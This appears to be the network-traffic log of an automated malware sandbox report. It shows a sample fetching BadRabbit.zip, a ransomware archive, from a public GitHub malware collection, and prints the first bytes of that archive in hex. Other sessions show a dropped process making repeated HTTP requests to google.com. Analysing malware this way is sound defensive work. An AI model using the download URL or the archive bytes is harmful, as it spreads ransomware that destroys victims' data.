                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        55192.168.2.449829140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        56192.168.2.449753172.217.168.1480C:\Users\user\yeYUggIg\rCUUIQEQ.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Sep 29, 2022 14:45:39.699918032 CEST4304OUTGET / HTTP/1.1
                                                                                                        Host: google.com
                                                                                                        Sep 29, 2022 14:45:39.744695902 CEST4305INHTTP/1.1 301 Moved Permanently
                                                                                                        Location: http://www.google.com/
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Date: Thu, 29 Sep 2022 12:45:39 GMT
                                                                                                        Expires: Sat, 29 Oct 2022 12:45:39 GMT
                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                        Server: gws
                                                                                                        Content-Length: 219
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        57192.168.2.449755172.217.168.1480C:\Users\user\yeYUggIg\rCUUIQEQ.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Sep 29, 2022 14:45:41.054780006 CEST4306OUTGET / HTTP/1.1
                                                                                                        Host: google.com
                                                                                                        Sep 29, 2022 14:45:41.099212885 CEST4306INHTTP/1.1 301 Moved Permanently
                                                                                                        Location: http://www.google.com/
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Date: Thu, 29 Sep 2022 12:45:41 GMT
                                                                                                        Expires: Sat, 29 Oct 2022 12:45:41 GMT
                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                        Server: gws
                                                                                                        Content-Length: 219
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        58192.168.2.449764172.217.168.1480C:\Users\user\yeYUggIg\rCUUIQEQ.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Sep 29, 2022 14:45:59.221445084 CEST7937OUTGET / HTTP/1.1
                                                                                                        Host: google.com
                                                                                                        Sep 29, 2022 14:45:59.265981913 CEST7938INHTTP/1.1 301 Moved Permanently
                                                                                                        Location: http://www.google.com/
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Date: Thu, 29 Sep 2022 12:45:59 GMT
                                                                                                        Expires: Sat, 29 Oct 2022 12:45:59 GMT
                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                        Server: gws
                                                                                                        Content-Length: 219
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        59192.168.2.449766172.217.168.1480C:\Users\user\yeYUggIg\rCUUIQEQ.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Sep 29, 2022 14:45:59.338293076 CEST7938OUTGET / HTTP/1.1
                                                                                                        Host: google.com
                                                                                                        Sep 29, 2022 14:45:59.382435083 CEST7939INHTTP/1.1 301 Moved Permanently
                                                                                                        Location: http://www.google.com/
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Date: Thu, 29 Sep 2022 12:45:59 GMT
                                                                                                        Expires: Sat, 29 Oct 2022 12:45:59 GMT
                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                        Server: gws
                                                                                                        Content-Length: 219
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>
                                                                                                        Sep 29, 2022 14:45:59.605654001 CEST7940INHTTP/1.1 301 Moved Permanently
                                                                                                        Location: http://www.google.com/
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Date: Thu, 29 Sep 2022 12:45:59 GMT
                                                                                                        Expires: Sat, 29 Oct 2022 12:45:59 GMT
                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                        Server: gws
                                                                                                        Content-Length: 219
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        6192.168.2.449713140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        7192.168.2.449714185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        8192.168.2.449715140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        9192.168.2.449716185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.449707140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:00 UTC0OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2022-09-29 12:45:00 UTC0INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:43:47 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:00 UTC0INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        1192.168.2.449708185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:00 UTC2OUTGET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2022-09-29 12:45:00 UTC2INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 402632
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 081E:1220:100920B:1104BA2:633592FF
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:00 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6975-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455500.446790,VS0,VE1
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 0cd7a8b251c8eea8fed3fc48e41ff66352bce01c
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:00 GMT
                                                                                                        Source-Age: 77
                                                                                                        2022-09-29 12:45:00 UTC3INData Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28
                                                                                                        Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>*kQ/+_Ux@SF2!7^Fv=.e*SVan EafRKz_VME,NxD{~tro4i_pS:2(
                                                                                                        2022-09-29 12:45:00 UTC4INData Raw: 34 32 65 b6 94 d6 82 b7 43 9e 4a 02 54 b5 35 79 77 8c f9 07 93 82 0a ea 8d ad c0 11 a4 0f c9 18 4d 97 d4 2b 21 fd 14 21 23 bb c3 75 54 09 b7 42 ea 85 01 a0 3e 79 a2 2a 6c 74 b8 19 55 58 7c 91 1c 9a 4b 1f bf c4 2c 5b 94 30 25 67 ea 17 e7 9e b7 9e 75 c0 e0 37 ec f1 7d 83 c9 2a 70 84 d9 f2 17 cd 1b 65 77 e8 15 a9 d6 30 27 03 62 99 43 e8 af e6 f3 37 3b bf 96 93 3e 56 12 2d ad 6a 24 17 4a 24 21 8c 72 90 22 84 ea 46 f9 7f d3 a4 2d 8a 96 aa f4 3b 8b d5 b9 52 93 63 91 ac 36 dd 22 be 4c bd 29 5a d5 f9 9c f2 54 df 96 38 c2 7a 8a a0 2a 54 3e bb 6b 33 fd d0 1a 52 f0 28 20 be 11 ea bd 23 a1 52 46 63 49 47 4c 46 fb 28 cd 1b 46 87 0a c7 dc 90 a8 f1 9d 8a b3 06 02 f8 29 7d 38 1a 36 15 ca 59 e4 4e aa 01 82 e1 63 5c 45 df 81 8e 9c d7 9b bd 14 cf e2 17 1d 97 e1 9b 99 0a c9
                                                                                                        Data Ascii: 42eCJT5ywM+!!#uTB>y*ltUX|K,[0%gu7}*pew0'bC7;>V-j$J$!r"F-;Rc6"L)ZT8z*T>k3R( #RFcIGLF(F)}86YNc\E
                                                                                                        2022-09-29 12:45:00 UTC6INData Raw: 0b 4e ef f3 6f de 93 7d a5 05 18 9d 45 49 ba f1 95 0a fe e5 1d 2c 3d 8d 9f b6 af 61 be ce 82 20 42 80 de 04 34 af 26 76 84 d9 b0 cd f2 ef 7d dc a0 96 8b e3 64 a3 16 dc d4 c2 dc e9 ab b5 55 06 32 cb 4f f0 b4 5e 63 02 ef 09 6a 9e 96 33 60 33 fe 8c 2a bc 38 61 c9 78 94 53 07 08 47 c4 fa e8 e7 33 bb dd 26 2e f2 f0 de ea d4 a8 f2 f4 b0 0e ed 58 b1 cb a3 dd 1c 2f 51 36 d5 9a db 7a bf 9c 05 95 0a d7 98 b5 6d 98 39 11 bc 35 fb 73 2a 8b 65 75 c1 c8 3a 5d f9 e7 53 79 08 72 37 05 31 50 43 96 46 b9 84 fb 94 4c cb 59 bc ad a5 4d a9 d2 ff fe c9 5c b4 de 43 1f c9 8b 9b d6 95 3a eb f1 c6 ea 6c 5f 18 ee 12 3d 01 e2 ec f1 db ca 1b 3d 5e b4 9e c5 a5 b2 0e 85 46 13 d9 7a 88 59 bd 6d cc fd 87 63 e7 b7 26 93 d5 62 61 25 0e 88 c4 97 f9 43 93 cb 88 94 d0 ad 67 9c 3c 40 b5 cc 8c
                                                                                                        Data Ascii: No}EI,=a B4&v}dU2O^cj3`3*8axSG3&.X/Q6zm95s*eu:]Syr71PCFLYM\C:l_==^FzYmc&ba%Cg<@
                                                                                                        2022-09-29 12:45:00 UTC7INData Raw: 8c 37 76 69 b4 a5 3e 45 27 e1 53 fb 7b 37 7b bc 8c 6b ab 81 72 b2 d9 c2 3e ea 9f 06 6d cb 02 98 fd c5 2f e6 6b 2c 3e 04 fd 0e a2 13 dc 90 47 67 94 9a 05 6a e2 72 51 6f 79 20 c0 af 9c b6 cd 7e 06 8b 75 f7 f4 5f 72 0e ce b1 55 7e ef e3 99 00 cd d7 da 5d fa 58 4d 5f 79 5b 28 fc 62 1c ae 59 81 43 d0 34 f7 eb e8 eb 32 6c 5e 27 c4 1c ec 02 9c 5d 5a 10 ac c5 8b e3 c2 79 46 de 52 af 04 f8 55 49 89 7e 4b 54 68 e0 6c b3 ac e5 2f c5 fd e2 ec 8d 51 c6 27 e4 30 fe cf 43 87 d9 ac c5 af da 94 77 e6 02 27 5c 83 72 37 b1 af a6 c4 fc 2b 13 dd 23 6b 9a 8d e2 a7 35 9c e2 05 29 79 32 af ba c8 bb b3 8c 60 1f 67 0c 24 c1 75 78 c6 4b 6e 11 4d ab 81 20 38 bd 91 9a fe c7 b9 bb 4a e2 be f0 aa 04 46 61 a9 e8 71 b6 b1 20 b9 a9 3c f3 51 26 1b 5c b0 ee 94 ff 86 61 b9 1d 6c 1b 50 cb 6f
                                                                                                        Data Ascii: 7vi>E'S{7{kr>m/k,>GgjrQoy ~u_rU~]XM_y[(bYC42l^']ZyFRUI~KThl/Q'0Cw'\r7+#k5)y2`g$uxKnM 8JFaq <Q&\alPo
                                                                                                        2022-09-29 12:45:00 UTC8INData Raw: c1 16 b7 77 97 48 37 28 7a 7b d4 b9 6c c7 17 29 0c 64 76 e8 86 67 1b f2 0e 51 87 a1 b3 07 5a 7b d8 66 cf f5 9a 3c ee 5e 88 07 bf ab 11 17 56 af 41 fa cb e8 fd d3 67 2f 42 83 dc 48 c4 a3 e7 22 d8 94 07 a7 7b 82 18 9e a6 f4 9c 28 2e f6 c1 7b b4 4c 21 da 36 7e 55 de 0b bd 81 0f 22 ad b2 fb 83 1b 3d 13 18 e1 f4 93 25 51 71 61 38 cc 76 6f d4 02 e5 75 59 61 b9 0f cb 08 d6 b9 c4 a5 69 83 80 51 fe b9 dd 2e 06 b5 3b af 1e be 76 e4 e6 ca df 7f 59 5f d4 ea 9d 7a cc d7 40 c8 65 73 e6 62 c8 7a 26 98 7d 22 ec 19 8f e2 bb cb d6 2c c7 69 66 a8 dd eb 4a 81 8f 13 8a ce 05 37 02 a4 27 de a9 3f 24 41 39 93 f5 e8 aa b0 82 82 e3 4d 39 23 54 01 a3 b8 14 ee 64 b4 47 fa 13 fc 5d da e7 b7 59 0e 5b 26 9c fd 12 0d 9c 49 08 f2 f6 5d 75 96 da 33 49 c4 58 47 e6 a7 92 96 08 4e 79 4e 04
                                                                                                        Data Ascii: wH7(z{l)dvgQZ{f<^VAg/BH"{(.{L!6~U"=%Qqa8vouYaiQ.;vY_z@esbz&}",ifJ7'?$A9M9#TdG]Y[&I]u3IXGNyN
                                                                                                        2022-09-29 12:45:00 UTC10INData Raw: 8b 07 5d 36 1d d5 87 3c 81 4d 8c 76 b4 d1 e6 fe aa 29 36 9b 5f 71 06 5c 95 d2 f1 29 d5 a3 57 eb cd 49 62 2b c8 bb 99 6f 11 f6 1c d8 c2 f0 5c 92 d4 79 70 43 ec 43 f1 1d 25 95 ee bc d8 d1 d0 62 34 d8 f3 03 91 a1 a8 28 43 dc aa 4c f2 88 9b cd ab fc c0 14 11 24 fd 32 33 f8 01 63 62 4b c1 dd ce 23 a7 84 9e 2c 6f db 41 43 cd 7c f5 43 9a 2b 49 29 72 df 5e 61 23 ca ab a6 04 f7 ab e5 2c fc 65 95 dd 78 ec 7d 25 c0 7e d4 16 50 79 3f 70 20 fb 66 92 72 95 ed 50 93 11 14 d8 c7 a0 ba 34 f0 38 2d 7a 5c d3 55 05 a5 74 f0 73 2a 08 1d 18 8c 8c 56 8d 98 41 a0 e8 9a 20 e9 f0 4b 34 3d d5 77 6a d2 95 7b 93 f8 37 46 5c a9 87 78 7c f1 64 9c d9 0e c3 c1 27 43 27 63 16 f1 03 bd e9 4b 17 69 56 12 9b 05 70 e8 62 80 66 23 f1 a1 7f d6 85 92 1c b5 d5 42 03 aa 02 96 41 16 3b e2 bd 96 fc
                                                                                                        Data Ascii: ]6<Mv)6_q\)WIb+o\ypCC%b4(CL$23cbK#,oAC|C+I)r^a#,ex}%~Py?p frP48-z\Uts*VA K4=wj{7F\x|d'C'cKiVpbf#BA;
                                                                                                        2022-09-29 12:45:00 UTC11INData Raw: 7b 7a 68 e8 33 12 2c 15 40 2c 54 ec 79 9a 52 b7 2f d4 85 2e cc eb 09 9d 4a 52 ff d8 d3 3b c7 ed 0a f3 20 cd 8b a1 b2 65 0d dc dd fb 1a fc bd db 77 35 8c 9b b7 1d c2 13 15 9f 96 1b ea d9 09 de 75 fc d2 50 94 7c 83 52 c4 12 c2 80 bd 30 89 79 fb c8 f6 ca 6f 50 dc ae a5 ae 1b 07 7c 12 e7 e8 9b e9 ef d9 88 12 bb a0 b9 91 82 d0 60 5a ae 0d 7e 28 dd d8 f9 4d 97 ce f3 d6 e4 04 29 53 09 03 b7 54 8b e2 67 09 26 e3 17 06 e5 10 7b 2a 21 9a 55 02 a4 7a 30 f6 f7 c6 c7 42 18 58 78 cd 4d 47 fe 5d 88 7e 04 6c 1a 05 2b 5d 70 e1 b9 56 93 28 5e 28 c5 34 76 58 a9 87 31 02 51 53 c7 e9 e0 db b8 86 73 73 9b 36 86 ff 87 d7 3a 57 d3 73 e6 81 c4 5e 1c 19 3f 0b 6f 2b 36 ab 96 c5 de 84 40 0d 4e 68 68 a9 40 e4 a9 97 75 14 83 79 d2 31 a0 5d c4 67 ec 46 84 b5 d6 ac 45 92 08 ea 0e 0f 66
                                                                                                        Data Ascii: {zh3,@,TyR/.JR; ew5uP|R0yoP|`Z~(M)STg&{*!Uz0BXxMG]~l+]pV(^(4vX1QSss6:Ws^?o+6@Nhh@uy1]gFEf
                                                                                                        2022-09-29 12:45:00 UTC12INData Raw: d0 2c 20 15 74 1f 26 b4 1e f0 69 f8 78 26 ad 42 87 4a 0f ad a9 6d b7 ab 50 c7 e4 11 d0 9f 9f 2d ce a4 97 74 b5 da a8 61 76 ab 27 1a 8a a6 d2 ea 68 d7 15 97 a7 d7 40 62 60 3d 07 a8 9a 34 4b a8 69 4c 45 2f 50 7c 98 e6 c0 b4 0b 56 00 d5 4b 0f 18 5b 92 27 38 31 31 ea 43 9e 9a 9a 29 88 9c cb 7e 87 5d 79 36 8c 96 7c c3 1c eb 26 13 a1 76 e9 87 f7 ca f1 58 46 22 94 f3 ad bd 29 87 93 af 16 6d 45 67 f5 fb b3 f0 47 28 70 e4 df 8f dd f1 1d 3c b4 77 8c f5 d5 82 8f 16 99 d8 d5 a6 1a 8b 00 23 84 50 66 c9 62 8b a1 7e 7c 6a 3f 8f 12 8c ed ce ab c4 5d b9 30 b4 e7 9e 38 1b 2a 01 b7 47 c9 a4 20 7f b2 be 91 d1 ad 5a ce ac e5 9c 4f c3 15 f7 66 dd 01 95 5e a0 d9 36 11 38 e1 5f 4b cd 59 16 41 e2 71 6a 4e 5f 25 14 75 50 d1 30 bc d5 2b 3f 10 75 c7 4b 21 70 eb 53 b0 21 fa e6 46 b9
                                                                                                        Data Ascii: , t&ix&BJmP-tav'h@b`=4KiLE/P|VK['811C)~]y6|&vXF")mEgG(p<w#Pfb~|j?]08*G ZOf^68_KYAqjN_%uP0+?uK!pS!F
                                                                                                        2022-09-29 12:45:00 UTC14INData Raw: 38 23 b6 e1 9c b9 61 ba 53 89 fe 4d 8b c1 de 1d 7f c9 0f 04 9c 2c 7d 8d c7 18 a4 bd dc a5 be 45 62 9c f5 4f 28 6f 3c ff 87 3f 4b 87 45 de 4f 8f 1d fe bd 02 a8 12 63 0d e0 58 c7 43 ca a3 e0 46 16 d6 45 1b ab a7 94 ec e6 76 0f da 15 da 0a b4 f9 fb 2f 8a 85 c0 19 28 46 b3 52 30 21 5c 87 79 34 e7 9a d7 74 59 c8 02 66 7c 43 ad cb 7a 18 6d 67 30 3f 78 3b 58 71 30 e0 7f ff 9d 23 69 00 f1 39 47 e3 88 15 95 50 6f a7 0e 04 63 36 0b eb 22 60 ee f4 5a a2 f1 df b8 3a b1 ae 8b 96 98 2d af d1 d7 2e 1c 30 b1 26 8b 3f ee d5 0b cb f2 4f ff 60 e4 15 14 ae c1 9b b0 fa b1 05 63 74 df d1 03 9e 22 35 29 92 ae 26 48 49 2c 76 87 bc ab e5 18 c0 d1 dd c2 3a 96 6b 3b 7c a8 aa 8a cc e9 6d ce 54 fe 1d dc cf 6e 08 3a a6 b3 d0 1c 3c 21 ba 23 ca 81 e8 c9 f6 17 d3 4a 9f b4 5f 70 86 39 c8
                                                                                                        Data Ascii: 8#aSM,}EbO(o<?KEOcXCFEv/(FR0!\y4tYf|Czmg0?x;Xq0#i9GPoc6"`Z:-.0&?O`ct"5)&HI,v:k;|mTn:<!#J_p9
